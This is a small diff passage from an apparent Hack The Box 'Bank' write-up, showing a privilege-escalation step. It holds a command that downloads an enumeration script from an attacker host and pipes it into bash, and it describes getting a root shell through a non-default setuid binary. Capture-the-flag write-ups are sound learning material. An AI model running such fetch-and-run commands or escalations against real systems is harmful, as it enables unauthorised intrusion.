Kyuu-Ji/htb-write-up/bank/write-up-bank.md

 wget http://10.10.14.23/LinEnum.sh | bash
 ```

-Looking at the results we see that there is a _setuid bit_ set on the **/var/htb/bin/emergency** binary that is not a default Linux binary.
+Looking at the results, there is a _setuid bit_ set on the **/var/htb/bin/emergency** binary that is not a default Linux binary.
 When executing this, we drop into a shell with the effective user ID of root and finished the box!